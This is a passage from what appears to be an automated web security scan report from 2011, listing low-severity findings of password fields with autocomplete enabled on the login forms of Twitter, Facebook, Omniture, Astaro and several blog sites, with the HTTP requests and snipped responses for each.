http://it.toolbox.com/blogs/penguinista-databasiensis

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/penguinista-databasiensis HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.23. http://it.toolbox.com/blogs/ppmtoday previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/ppmtoday

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/ppmtoday

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/ppmtoday HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.24. https://login.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.25. https://login.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

13.26. https://login.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.27. https://login.facebook.com/help/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/help/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.28. https://login.facebook.com/login.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/login.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.29. https://login.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.30. https://login.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/r.php?locale=en_US

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

GET /r.php?locale=en_US HTTP/1.1
Host: login.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=deleted; datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=deleted; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=deleted; __utmc=deleted; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmb=deleted;

Response

13.31. https://login.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/r.php

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

13.32. https://publish.omniture.com/center/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://publish.omniture.com
Path:	/center/

Issue detail

The page contains a form with the following action URL:

https://publish.omniture.com/center/

The form contains the following password field with autocomplete enabled:

sp_password

Request

GET /center/ HTTP/1.1
Host: publish.omniture.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:00:33 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 publish.omniture.com:88
X-Cache: MISS from publish.omniture.com
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
X-Pad: avoid browser bug
Content-Length: 10244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright (c) 2011 Adobe Systems Incorporated. All ri
...[SNIP]...
<div id="left_panel">

<form method="post" action="/center/" target="_top">

<div id="login_container">
...[SNIP]...
<br />
<input type="password" id="password" name="sp_password" class="input" /><br />
...[SNIP]...

13.33. https://sitesearch.omniture.com/center/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://sitesearch.omniture.com
Path:	/center/

Issue detail

The page contains a form with the following action URL:

https://sitesearch.omniture.com/center/

The form contains the following password field with autocomplete enabled:

sp_password

Request

Response

13.34. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.35. http://twitter.com/BWBLLC previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/BWBLLC

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /BWBLLC HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.36. http://twitter.com/BW_Technology previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/BW_Technology

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /BW_Technology HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.37. http://twitter.com/Chester_Pitts previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Chester_Pitts

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.38. http://twitter.com/Cirque previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Cirque

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.39. http://twitter.com/JetBlue previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/JetBlue

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.40. http://twitter.com/JohnsHopkinsSPH previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/JohnsHopkinsSPH

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.41. http://twitter.com/McKQuarterly previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/McKQuarterly

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.42. http://twitter.com/MomsWhoSave previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/MomsWhoSave

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.43. http://twitter.com/NetworkConnects previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/NetworkConnects

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /NetworkConnects HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.44. http://twitter.com/Nightline previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Nightline

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.45. http://twitter.com/NoReservations previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/NoReservations

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.46. http://twitter.com/NylonMag previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/NylonMag

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.47. http://twitter.com/OmnitureEMEA previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/OmnitureEMEA

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.48. http://twitter.com/PeaceCorps previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/PeaceCorps

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.49. http://twitter.com/Support previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Support

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.50. http://twitter.com/TakeoSpikes51 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/TakeoSpikes51

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.51. http://twitter.com/TomorrowCounsel previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/TomorrowCounsel

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /TomorrowCounsel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.52. http://twitter.com/VirginiaBeachWk previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/VirginiaBeachWk

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /VirginiaBeachWk HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.53. http://twitter.com/Wyome655 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Wyome655

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /Wyome655 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.54. http://twitter.com/arnui previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/arnui

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /arnui HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.55. http://twitter.com/ashleytisdale previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ashleytisdale

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.56. http://twitter.com/best_golf previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/best_golf

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /best_golf HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.57. http://twitter.com/buyantsogtoo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/buyantsogtoo

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /buyantsogtoo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.58. http://twitter.com/chain_llc previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/chain_llc

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /chain_llc HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.59. http://twitter.com/chain_llc_cod previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/chain_llc_cod

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /chain_llc_cod HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.60. http://twitter.com/chain_llc_mg previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/chain_llc_mg

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /chain_llc_mg HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.61. http://twitter.com/cloudscan previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/cloudscan

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /cloudscan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.62. http://twitter.com/coolmompicks previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/coolmompicks

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.63. http://twitter.com/davidgregory previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/davidgregory

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.64. http://twitter.com/designmilk previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/designmilk

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.65. http://twitter.com/donlomb previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/donlomb

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /donlomb HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.66. http://twitter.com/gamespot previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/gamespot

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.67. http://twitter.com/jasmith579 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/jasmith579

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /jasmith579 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.68. http://twitter.com/jobs4writers previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/jobs4writers

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /jobs4writers HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.69. http://twitter.com/ligatt previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ligatt

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /ligatt HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.70. http://twitter.com/lijobs_sales previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/lijobs_sales

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /lijobs_sales HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.71. http://twitter.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.72. http://twitter.com/millenniumpr previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/millenniumpr

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /millenniumpr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.73. http://twitter.com/omniture previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/omniture

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.74. http://twitter.com/omniturecare previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/omniturecare

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.75. http://twitter.com/orbitz previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/orbitz

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /orbitz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.76. http://twitter.com/prolawrssfeed previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/prolawrssfeed

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /prolawrssfeed HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.77. http://twitter.com/qianam previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/qianam

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /qianam HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.78. http://twitter.com/rosyresources previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/rosyresources

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /rosyresources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.79. http://twitter.com/sarahdessen previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/sarahdessen

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.80. http://twitter.com/science previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/science

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.81. http://twitter.com/search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.82. http://twitter.com/sethmeyers21 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/sethmeyers21

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.83. http://twitter.com/sp_arizona previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/sp_arizona

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /sp_arizona HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.84. http://twitter.com/sp_oregon previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/sp_oregon

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /sp_oregon HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.85. http://twitter.com/sp_tx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/sp_tx

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /sp_tx HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.86. http://twitter.com/toptweets/favorites previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/toptweets/favorites

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.87. https://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.88. https://twitter.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://twitter.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.89. https://twitter.com/sessions previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://twitter.com
Path:	/sessions

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

13.90. http://wp-superslider.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://wp-superslider.com/site/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.91. https://www.astaro.co.uk/beacon/(beid previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.astaro.co.uk
Path:	/beacon/(beid

Issue detail

The page contains a form with the following action URL:

https://www.astaro.co.uk/user/login

The form contains the following password field with autocomplete enabled:

Password

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:30:22 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: eZSESSIDeu=bv7eodcrp0t34v0n39i8932ve0; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 14:30:22 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.co.uk
Content-language: en-GB
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<head>

...[SNIP]...
</h1>
       <form method="post" action="/user/login">
           <input type="hidden" name="RedirectURI" value="beacon/(beid" />
...[SNIP]...
<td style="padding-left: 10px;"><input class="halfbox" type="password" size="10" name="Password" id="password" value="" /></td>
...[SNIP]...

13.92. https://www.astaro.com/beacon/(beid previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/beacon/(beid

Issue detail

The page contains a form with the following action URL:

https://www.astaro.com/en/user/login

The form contains the following password field with autocomplete enabled:

Password

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-4; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.4.10.1296568533;

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 13:58:57 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:58:57 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta
...[SNIP]...
</h1>
       <form method="post" action="/en/user/login">
           <input type="hidden" name="RedirectURI" value="beacon/(beid" />
...[SNIP]...
